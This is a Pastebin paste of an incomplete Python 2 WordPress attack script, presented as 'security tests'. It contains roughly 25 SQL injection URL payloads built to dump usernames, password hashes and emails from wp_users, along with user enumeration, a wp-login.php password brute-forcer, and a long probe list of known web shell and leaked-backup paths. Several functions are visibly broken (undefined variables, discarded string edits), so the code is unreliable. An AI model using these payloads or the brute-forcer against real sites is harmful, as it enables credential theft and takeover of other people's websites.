Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!c:/Python27/python.exe
- # Little Code to do security tests on wordpress Link it together to use it
- # Wroten by MatriX Coder (Mohamed Aziz From Tunisia :D) you can edit my rigths
- # I didn't wrote all the code | Wroten Under windows XP VM in geany :D
- # I didn't complete the code and some parts won't work ! Good luck :D
- import urllib2
- import urllib
- import re
- import cookielib
- import json
- class Wordpress :
- def __init__(self, site) :
- if 'http://' not in site :
- 'http://' + site
- if site[-1] != '/' :
- site + '/'
- self.site = site
- def scanDB(self) :
- """
- serch common wordpress vulnerabilities from
- a little databese
- Wroten by By M.tucX
- """
- vuln = {}
- dzx = { "wp-content/themes/dandelion/" : "www.exploit-db.com/exploits/31571/",
- "wp-content/uploads/feuGT_uploads/feuGT_1790_43000000_948109840.php" : "http://www.exploit-db.com/exploits/31570/" ,
- "wp-content/plugins/formcraft/form.php?id=1" : "Wordpress formcraft Plugin Sql Injection",
- "wp-content/themes/kernel-theme/functions/upload-handler.php" : "http://www.exploit-db.com/exploits/29482/",
- "wp-content/themes/saico/framework/_scripts/valums_uploader/php.php" : "http://www.exploit-db.com/exploits/29150/",
- "wp-content/themes/ThinkResponsive/includes/uploadify/upload_settings_image.php" : "http://www.exploit-db.com/exploits/29332/",
- "wp-content/themes/rockstar-theme/functions/upload-handler.php" :"http://www.exploit-db.com/exploits/29946/",
- "wp-content/plugins/page-flip-image-gallery/upload.php" : "http://www.exploit-db.com/exploits/30084/",
- "wp-content/themes/area53/framework/_scripts/valums_uploader/php.php" : "http://www.exploit-db.com/exploits/29068/",
- "wp-content/plugins/complete-gallery-manager/frames/upload-images.php" : "http://www.exploit-db.com/exploits/28377/" }
- for xpl, poc in dzx.items() :
- if urllib.urlopen(self.site).getcode() not in [400,401,404] :
- vuln[xpl] = poc
- return vuln
- def sqliDB(self) :
- """
- search for sql injection vulnerabilities
- (this piece of code was written in 2010
- by vyc0d old but gold it still work on some sites)
- """
- # Writen by vyc0d
- sqli = []
- sqls = ["index.php?cat=999%20UNION%20SELECT%20null,CONCAT(CHAR(58),user_pass,CHAR(58),user_login,CHAR(58)),null,null,null%20FROM%20wp_users/*",
- "index.php?cat=%2527%20UNION%20SELECT%20CONCAT(CHAR(58),user_pass,CHAR(58),user_login,CHAR(58))%20FROM%20wp_users/*",
- "index.php?exact=1&sentence=1&s=%b3%27)))/**/AND/**/ID=-1/**/UNION/**SELECT**/1,2,3,4,5,user_pass,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24/**/FROM/**/wp_users%23",
- "index?page_id=115&forumaction=showprofile&user=1+union+select+null,concat(user_login,0x2f,user_pass,0x2f,user_email),null,null,null,null,null+from+wp_tbv_users/*",
- "wp-content/plugins/wp-cal/functions/editevent.php?id=-1%20union%20select%201,concat(user_login,0x3a,user_pass,0x3a,user_email),3,4,5,6%20from%20wp_users--",
- "wp-content/plugins/fgallery/fim_rss.php?album=-1%20union%20select%201,concat(user_login,0x3a,user_pass,0x3a,user_email),3,4,5,6,7%20from%20wp_users--",
- "wp-content/plugins/wassup/spy.php?to_date=-1%20group%20by%20id%20union%20select%20null,null,null,conca(0x7c,user_login,0x7c,user_pass,0x7c),null,null,null,null,null,null,null,null%20%20from%20wp_users",
- "wordspew-rss.php?id=-998877/**/UNION/**/SELECT/**/0,1,concat(0x7c,user_login,0x7c,user_pass,0x7c),concat(0x7c,user_login,0x7c,user_pass,0x7c),4,5/**/FROM/**/wp_users",
- "wp-content/plugins/st_newsletter/shiftthis-preview.php?newsletter=-1/**/UNION/**/SELECT/**/concat(0x7c,user_login,0x7c,user_pass,0x7c)/**/FROM/**/wp_users",
- "sf-forum?forum=-99999/**/UNION/**/SELECT/**/concat(0x7c,user_login,0x7c,user_pass,0x7c)/**/FROM/**/wp_users/*",
- "sf-forum?forum=-99999/**/UNION/**/SELECT/**/0,concat(0x7c,user_login,0x7c,user_pass,0x7c),0,0,0,0,0/**/FROM/**/wp_users/*",
- "forums?forum=1&topic=-99999/**/UNION/**/SELECT/**/concat(0x7c,user_login,0x7c,user_pass,0x7c)/**/FROM/**/wp_users/*",
- "index?page_id=2&album=S@BUN&photo=-333333%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/concat(0x7c,user_login,0x7c,user_pass,0x7c)/**/from%2F%2A%2A%2Fwp_users/**WHERE%20admin%201=%201",
- "wp-download.php?dl_id=null/**/union/**/all/**/select/**/concat(user_login,0x3a,user_pass)/**/from/**/wp_users/*",
- "wpSS/ss_load.php?ss_id=1+and+(1=0)+union+select+1,concat(user_login,0x3a,user_pass,0x3a,user_email),3,4+from+wp_users--&display=plain",
- "wp-content/plugins/nextgen-smooth-gallery/nggSmoothFrame.php?galleryID=-99999/**/UNION/**/SELECT/**/concat(0x7c,user_login,0x7c,user_pass,0x7c)/**/FROM/**/wp_users/*",
- "myLDlinker.php?url=-2/**/UNION/**/SELECT/**/concat(0x7c,user_login,0x7c,user_pass,0x7c)/**/FROM/**/wp_users/*",
- "?page_id=2/&forum=all&value=9999+union+select+(select+concat_ws(0x3a,user_login,user_pass)+from+wp_users+LIMIT+0,1)--+&type=9&search=1&searchpage=2",
- "wp-content/themes/limon/cplphoto.php?postid=-2+and+1=1+union+all+select+1,2,concat(user_login,0x3a,user_pass),4,5,6,7,8,9,10,11,12+from+wp_users--&id=2",
- "?event_id=-99999/**/UNION/**/SELECT/**/concat(0x7c,user_login,0x7c,user_pass,0x7c)/**/FROM/**/wp_users/*",
- "wp-content/plugins/photoracer/viewimg.php?id=-99999+union+select+0,1,2,3,4,user(),6,7,8/*",
- "?page_id=2&id=-999+union+all+select+1,2,3,4,group_concat(user_login,0x3a,user_pass,0x3a,user_email),6+from+wp_users/*",
- "wp-content/plugins/wp-forum/forum_feed.php?thread=-99999+union+select+1,2,3,concat(user_login,0x2f,user_pass,0x2f,user_email),5,6,7+from+wp_users/*",
- "mediaHolder.php?id=-9999/**/UNION/**/SELECT/**/concat(User(),char(58),Version()),2,3,4,5,6,Database()--",
- "wp-content/plugins/st_newsletter/stnl_iframe.php?newsletter=-9999+UNION+SELECT+concat(user_login,0x3a,user_pass,0x3a,user_email)+FROM+wp_users--",
- "wp-content/plugins/wpSS/ss_load.php?ss_id=1+and+(1=0)+union+select+1,concat(user_login,0x3a,user_pass,0x3a,user_email),3,4+from+wp_users--&display=plain",
- "wp-download.php?dl_id=null/**/union/**/all/**/select/**/concat(user_login,0x3a,user_pass)/**/from/**/wp_users/*"]
- for sql in sqls :
- html = urllib.urlopen(self.site+sql).read()
- md5s = re.findall("[a-f0-9]"*32,source)
- if md5s :
- sqli.append(self.site+sql)
- return sqli
- def pathDiscloure(self) :
- """
- full path disclosure vulnerability
- """
- error = urllib2.urlopen(self.site).read()
- if error is not None :
- return None
- else :
- return ("[" + self.body.replace("<b>", '').replace("</b>", "").replace("<br />", "").strip("\n")+"]").strip()
- def findPlugins(self, pluginsfile) :
- """
- find target plugins
- """
- foundplugins = []
- self.pluginsfile = pluginsfile
- for line in open(self.pluginsfile, 'r').read().rsplit():
- if line :
- respcode = urllib.urlopen(self.site+ 'wp-content/plugins/' + line + '/').getcode()
- if respcode != 404 :
- print line
- foundplugins.append(line)
- return foundplugins
- def getVersionRDme(self) :
- """
- get wordpress version number
- """
- # get version from readme.html
- html = urllib2.urlopen(self.site + 'readme.html').read()
- return re.search('Version (.*)', html).group(1)
- def getUsers(self, nbusers) :
- """
- get wordpress users
- """
- userlist = []
- i = 1
- while( i <= nbusers ) :
- url = self.site + '?author=%i' % i
- try:
- html = urllib2.urlopen(url).read()
- except urllib2.URLError :
- print '[-] The page returned ->', urllib.urlopen(url).getcode()
- re1 = re.findall("<title>(.*?)</title>" , html)
- user = re.search("(.*?) |" , re1[0]).group(1)
- userlist.append(user)
- i += 1
- return userlist
- def bruteForce(self, user, passwdfile) :
- """
- bruteforce wordpress (wp-login.php)
- """
- for passwd in open(passwdfile, 'r').read().rsplit() :
- cj = cookielib.CookieJar()
- opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
- login_data = urllib.urlencode({'log' : user, 'pwd' : passwd})
- opener.open(str(site) + 'wp-login.php', login_data)
- resp = opener.open(str(site)+'wp-admin')
- final = resp.read()
- if '<li id="wp-admin-bar-logout">' in final:
- return user + ':' + passwd
- break
- def shellFinder(self, shellsfile) :
- foundshells = []
- shells = ['wp-content/plugins/akismet/akismet.php',
- 'wp-content/plugins/disqus-comment-system/disqus.php',
- 'wp-content/plugins/akismet/akismet.php',
- 'wp-content/plugins/akismet/admin.php#',
- 'wp-content/plugins/google-sitemap-generator/sitemap-core.php#',
- 'wp-content/plugins/akismet/widget.php#',
- 'wp-content/plugins/disqus-comment-system/disqus.php',
- 'wp-content/plugins/count-per-day/js/yc/d00.php',
- 'wp-content/plugins/disqus-comment-system/Sym.php',
- 'wp-content/plugins/disqus-comment-system/c22.php',
- 'wp-content/plugins/disqus-comment-system/c100.php',
- 'wp-content/plugins/disqus-comment-system/configuration.php',
- 'wp-content/plugins/disqus-comment-system/g.php',
- 'wp-content/plugins/disqus-comment-system/xx.pl',
- 'wp-content/plugins/disqus-comment-system/ls.php',
- 'wp-content/plugins/disqus-comment-system/Cpanel.php',
- 'wp-content/plugins/disqus-comment-system/k.php',
- 'wp-content/plugins/disqus-comment-system/zone-h.php',
- 'wp-content/plugins/disqus-comment-system/tmp/user.php',
- 'wp-content/plugins/disqus-comment-system/tmp/Sym.php',
- 'wp-content/plugins/disqus-comment-system/cp.php',
- 'wp-content/plugins/disqus-comment-system/tmp/madspotshell.php',
- 'wp-content/plugins/disqus-comment-system/tmp/root.php',
- 'wp-content/plugins/disqus-comment-system/tmp/whmcs.php',
- 'wp-content/plugins/disqus-comment-system/tmp/index.php',
- 'wp-content/plugins/disqus-comment-system/tmp/2.php',
- 'wp-content/plugins/disqus-comment-system/tmp/dz.php',
- 'wp-content/plugins/disqus-comment-system/tmp/cpn.php',
- 'wp-content/plugins/disqus-comment-system/tmp/changeall.php',
- 'wp-content/plugins/disqus-comment-system/tmp/Cgishell.pl',
- 'wp-content/plugins/disqus-comment-system/tmp/sql.php',
- 'wp-content/plugins/disqus-comment-system/0day.php',
- 'wp-content/plugins/disqus-comment-system/tmp/admin.php',
- 'wp-content/plugins/disqus-comment-system/L3b.php',
- 'wp-content/plugins/disqus-comment-system/d.php',
- 'wp-content/plugins/disqus-comment-system/tmp/d.php',
- 'wp-content/plugins/disqus-comment-system/tmp/L3b.php',
- 'wp-content/plugins/disqus-comment-system/sado.php',
- 'wp-content/plugins/disqus-comment-system/admin1.php',
- 'wp-content/plugins/akismet/WSO.php',
- 'wp-content/plugins/akismet/dz.php',
- 'wp-content/plugins/akismet/DZ.php',
- 'wp-content/plugins/akismet/cpanel.php',
- 'wp-content/plugins/akismet/cpn.php',
- 'wp-content/plugins/akismet/sos.php',
- 'wp-content/plugins/akismet/term.php',
- 'wp-content/plugins/akismet/Sec-War.php',
- 'wp-content/plugins/akismet/sql.php',
- 'wp-content/plugins/akismet/ssl.php',
- 'wp-content/plugins/akismet/info.php',
- 'wp-content/plugins/akismet/egyshell.php',
- 'wp-content/plugins/akismet/Sym.php',
- 'wp-content/plugins/akismet/c22.php',
- 'wp-content/plugins/akismet/c100.php',
- 'wp-content/plugins/akismet/configuration.php',
- 'wp-content/plugins/akismet/g.php',
- 'wp-content/plugins/akismet/xx.pl',
- 'wp-content/plugins/akismet/ls.php',
- 'wp-content/plugins/akismet/Cpanel.php',
- 'wp-content/plugins/akismet/k.php',
- 'wp-content/plugins/akismet/zone-h.php',
- 'wp-content/plugins/akismet/tmp/user.php',
- 'wp-content/plugins/akismet/tmp/Sym.php',
- 'wp-content/plugins/akismet/cp.php',
- 'wp-content/plugins/akismet/tmp/madspotshell.php',
- 'wp-content/plugins/akismet/tmp/root.php',
- 'wp-content/plugins/akismet/tmp/whmcs.php',
- 'wp-content/plugins/akismet/tmp/index.php',
- 'wp-content/plugins/akismet/tmp/2.php',
- 'wp-content/plugins/akismet/tmp/dz.php',
- 'wp-content/plugins/akismet/tmp/cpn.php',
- 'wp-content/plugins/akismet/tmp/changeall.php',
- 'wp-content/plugins/akismet/tmp/Cgishell.pl',
- 'wp-content/plugins/akismet/tmp/sql.php',
- 'wp-content/plugins/akismet/0day.php',
- 'wp-content/plugins/akismet/tmp/admin.php',
- 'wp-content/plugins/akismet/L3b.php',
- 'wp-content/plugins/akismet/d.php',
- 'wp-content/plugins/akismet/tmp/d.php',
- 'wp-content/plugins/akismet/tmp/L3b.php',
- 'wp-content/plugins/akismet/sado.php',
- 'wp-content/plugins/akismet/admin1.php',
- 'wp-content/plugins/akismet/upload.php',
- 'wp-content/plugins/akismet/up.php',
- 'wp-content/plugins/akismet/vb.zip',
- 'wp-content/plugins/akismet/vb.rar',
- 'wp-content/plugins/akismet/admin2.asp',
- 'wp-content/plugins/akismet/uploads.php',
- 'wp-content/plugins/akismet/sa.php',
- 'wp-content/plugins/akismet/sysadmins/',
- 'wp-content/plugins/akismet/admin1/',
- 'wp-content/plugins/akismet/sniper.php',
- 'wp-content/plugins/akismet//ftp.txt',
- 'wp-content/plugins/akismet//user.txt',
- 'wp-content/plugins/akismet//site.txt',
- 'wp-content/plugins/akismet//error_log',
- 'wp-content/plugins/akismet//error',
- 'wp-content/plugins/akismet//cpanel',
- 'wp-content/plugins/akismet//awstats',
- 'wp-content/plugins/akismet//site.sql',
- 'wp-content/plugins/akismet//vb.sql',
- 'wp-content/plugins/akismet//forum.sql',
- 'wp-content/plugins/akismet/r00t-s3c.php',
- 'wp-content/plugins/akismet/c.php',
- 'wp-content/plugins/akismet//backup.sql',
- 'wp-content/plugins/akismet//back.sql',
- 'wp-content/plugins/akismet//data.sql',
- 'wp-content/plugins/akismet/wp.rar/',
- 'wp-content/plugins/akismet/asp.aspx',
- 'wp-content/plugins/akismet/tmp/vaga.php',
- 'wp-content/plugins/akismet/tmp/killer.php',
- 'wp-content/plugins/akismet/whmcs.php',
- 'wp-content/plugins/akismet/abuhlail.php',
- 'wp-content/plugins/akismet/tmp/killer.php',
- 'wp-content/plugins/akismet/tmp/domaine.pl',
- 'wp-content/plugins/akismet/tmp/domaine.php',
- 'wp-content/plugins/akismet/useradmin/',
- 'wp-content/plugins/akismet/tmp/d0maine.php',
- 'wp-content/plugins/akismet/d0maine.php',
- 'wp-content/plugins/akismet/tmp/sql.php',
- 'wp-content/plugins/akismet/X.php',
- 'wp-content/plugins/akismet/123.php',
- 'wp-content/plugins/akismet/m.php',
- 'wp-content/plugins/akismet/b.php',
- 'wp-content/plugins/akismet/up.php',
- 'wp-content/plugins/akismet/tmp/dz1.php',
- 'wp-content/plugins/akismet/dz1.php',
- 'wp-content/plugins/akismet/forum.zip',
- 'wp-content/plugins/akismet/Symlink.php',
- 'wp-content/plugins/akismet/Symlink.pl',
- 'wp-content/plugins/akismet/forum.rar',
- 'wp-content/plugins/akismet/joomla.zip',
- 'wp-content/plugins/akismet/joomla.rar',
- 'wp-content/plugins/akismet/wp.php',
- 'wp-content/plugins/akismet/buck.sql',
- 'wp-content/plugins/akismet/sysadmin.php',
- 'wp-content/plugins/akismet/images/c99.php',
- 'wp-content/plugins/akismet/xd.php',
- 'wp-content/plugins/akismet/c100.php',
- 'wp-content/plugins/akismet/spy.aspx',
- 'wp-content/plugins/akismet/xd.php',
- 'wp-content/plugins/akismet/tmp/xd.php',
- 'wp-content/plugins/akismet/sym/root/home/',
- 'wp-content/plugins/akismet/billing/killer.php',
- 'wp-content/plugins/akismet/tmp/upload.php',
- 'wp-content/plugins/akismet/tmp/admin.php',
- 'wp-content/plugins/akismet/Server.php',
- 'wp-content/plugins/akismet/tmp/uploads.php',
- 'wp-content/plugins/akismet/tmp/up.php',
- 'wp-content/plugins/akismet/Server/',
- 'wp-content/plugins/akismet/wp-admin/c99.php',
- 'wp-content/plugins/akismet/tmp/priv8.php',
- 'wp-content/plugins/akismet/priv8.php',
- 'wp-content/plugins/akismet/cgi.pl/',
- 'wp-content/plugins/akismet/tmp/cgi.pl',
- 'wp-content/plugins/akismet/downloads/dom.php',
- 'wp-content/plugins/akismet/webadmin.html',
- 'wp-content/plugins/akismet/admins.php',
- 'wp-content/plugins/akismet/bluff.php',
- 'wp-content/plugins/akismet/king.jeen',
- 'wp-content/plugins/akismet/admins/',
- 'wp-content/plugins/akismet/admins.asp',
- 'wp-content/plugins/akismet/admins.php',
- 'wp-content/plugins/akismet/wp.zip',
- 'wp-content/plugins/akismet/disqus.php',
- 'wp-content/plugins/google-sitemap-generator//cpanel',
- 'wp-content/plugins/google-sitemap-generator//awstats',
- 'wp-content/plugins/google-sitemap-generator//site.sql',
- 'wp-content/plugins/google-sitemap-generator//vb.sql',
- 'wp-content/plugins/google-sitemap-generator//forum.sql',
- 'wp-content/plugins/google-sitemap-generator/r00t-s3c.php',
- 'wp-content/plugins/google-sitemap-generator/c.php',
- 'wp-content/plugins/google-sitemap-generator//backup.sql',
- 'wp-content/plugins/google-sitemap-generator//back.sql',
- 'wp-content/plugins/google-sitemap-generator//data.sql',
- 'wp-content/plugins/google-sitemap-generator/wp.rar/',
- 'wp-content/plugins/google-sitemap-generator/asp.aspx',
- 'wp-content/plugins/google-sitemap-generator/tmp/xd.php',
- 'wp-content/plugins/google-sitemap-generator/sym/root/home/',
- 'wp-content/plugins/google-sitemap-generator/billing/killer.php',
- 'wp-content/plugins/google-sitemap-generator/tmp/upload.php',
- 'wp-content/plugins/google-sitemap-generator/tmp/admin.php',
- 'wp-content/plugins/google-sitemap-generator/Server.php',
- 'wp-content/plugins/google-sitemap-generator/tmp/uploads.php',
- 'wp-content/plugins/google-sitemap-generator/tmp/up.php',
- 'wp-content/plugins/google-sitemap-generator/Server/',
- 'wp-content/plugins/google-sitemap-generator/wp-admin/c99.php',
- 'wp-content/plugins/google-sitemap-generator/tmp/priv8.php',
- 'wp-content/plugins/google-sitemap-generator/priv8.php',
- 'wp-content/plugins/google-sitemap-generator/cgi.pl/',
- 'wp-content/plugins/google-sitemap-generator/tmp/cgi.pl',
- 'wp-content/plugins/google-sitemap-generator/downloads/dom.php',
- 'wp-content/plugins/google-sitemap-generator/webadmin.html',
- 'wp-content/plugins/google-sitemap-generator/admins.php',
- 'wp-content/plugins/google-sitemap-generator/bluff.php',
- 'wp-content/plugins/google-sitemap-generator/king.jeen',
- 'wp-content/plugins/google-sitemap-generator/admins/',
- 'wp-content/plugins/google-sitemap-generator/admins.asp',
- 'wp-content/plugins/google-sitemap-generator/admins.php',
- 'wp-content/plugins/google-sitemap-generator/wp.zip',
- 'wp-content/plugins/google-sitemap-generator/sitemap-core.php']
- for shell in shells :
- respcode = urllib.urlopen(self.site + shell).getcode()
- if respcode == 200 :
- foundshells.append(self.site + shell)
- return foundshells
- def versionScan(self, wp_vulns) :
- json_data = open(wp_vulns)
- data = json.load(json_data)
Add Comment
Please, Sign In to add comment
